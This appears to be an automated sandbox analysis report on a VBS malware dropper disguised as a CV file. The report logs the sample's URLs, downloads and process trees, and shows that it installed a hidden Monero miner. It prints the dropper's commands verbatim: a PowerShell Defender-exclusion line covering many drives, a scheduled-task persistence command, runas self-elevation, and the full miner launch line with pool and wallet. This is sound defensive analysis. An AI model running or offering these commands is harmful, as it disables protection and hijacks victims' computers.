                    Source: wscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb
                    Source: wscript.exe, 0000001D.00000002.821669261.000001CE40AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821620533.000001CE3F11D000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.13.drString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
                    Source: wscript.exe, 00000019.00000003.753938394.0000025057FD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754010637.0000025057FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.753878427.0000025057FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1
                    Source: wscript.exe, 00000019.00000003.754146201.0000025057FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754250011.0000025057FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1&&T
                    Source: wscript.exe, 00000019.00000002.754546393.00000250582A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000002.771953581.0000026FFEA15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee
                    Source: wscript.exe, 00000005.00000002.728550362.00000252701BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726622211.00000252701BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                    Source: wscript.exe, 00000005.00000002.727305157.000002526E1B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/
                    Source: wscript.exe, 00000005.00000003.344943313.000002526FF09000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie_(1).vbsString found in binary or memory: https://www.7-zip.org/a/7zr.exe
                    Source: wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/a/7zr.exe=
                    Source: wscript.exe, 00000005.00000002.728323335.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723130778.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726527500.000002527005B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/a/7zr.exeA
                    Source: wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/a/7zr.exeS
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drString found in binary or memory: https://xmrig.com/wizard
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drString found in binary or memory: https://xmrig.com/wizard%s
                    Source: unknownDNS traffic detected: queries for: www.7-zip.org
                    Source: global trafficHTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cv1811930/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49700 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Wscript called in batch mode (surpress errors)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
                    Potential malicious VBS script found (suspicious strings)
                    Source: Initial file: L5paqsMshiMdL5.ShellExecute L5c7Po4E6L5,L5b9q8vcZGaL5,"","runas",0
                    Source: Initial file: L5paqsMshiMdL5.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1
                    Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B53FD513_2_00B53FD5
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B781E013_2_00B781E0
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B741C813_2_00B741C8
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B7C36013_2_00B7C360
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B6C35013_2_00B6C350
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B6C4B013_2_00B6C4B0
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B8253A13_2_00B8253A
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B2851913_2_00B28519
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B3E6A713_2_00B3E6A7
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B8262113_2_00B82621
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B5C88D13_2_00B5C88D
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B2A87C13_2_00B2A87C
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B6A9C013_2_00B6A9C0
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B7E96013_2_00B7E960
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B66A0013_2_00B66A00
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B2AA4513_2_00B2AA45
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B7EB3913_2_00B7EB39
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B74B0013_2_00B74B00
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B2CDBD13_2_00B2CDBD
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B70D8913_2_00B70D89
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B74E2013_2_00B74E20
                    Source: C:\Users\Public\7g.exeCode function: String function: 00B11E89 appears 62 times
                    Source: C:\Users\Public\7g.exeCode function: String function: 00B7F140 appears 287 times
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B1801A: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,13_2_00B1801A
                    Source: curriculum_vitae-copie_(1).vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to behavior
                    Source: C:\Users\Public\7g.exeProcess token adjusted: SecurityJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\WindowsUpdate\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                    Source: go.exe.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.993395475414692
                    Source: curriculum_vitae-copie_(1).vbsReversingLabs: Detection: 18%
                    Source: curriculum_vitae-copie_(1).vbsVirustotal: Detection: 20%
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
                    Source: C:\Users\Public\7g.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7zJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B22A5F __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00B22A5F
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B19032 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,13_2_00B19032
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\computer_7Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgx5s5ts.jon.ps1Jump to behavior
                    Source: WinRing0x64.sys.13.drBinary string: \Device\WinRing0_1_2_0
                    Source: classification engineClassification label: mal100.troj.evad.mine.winVBS@32/17@2/3
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
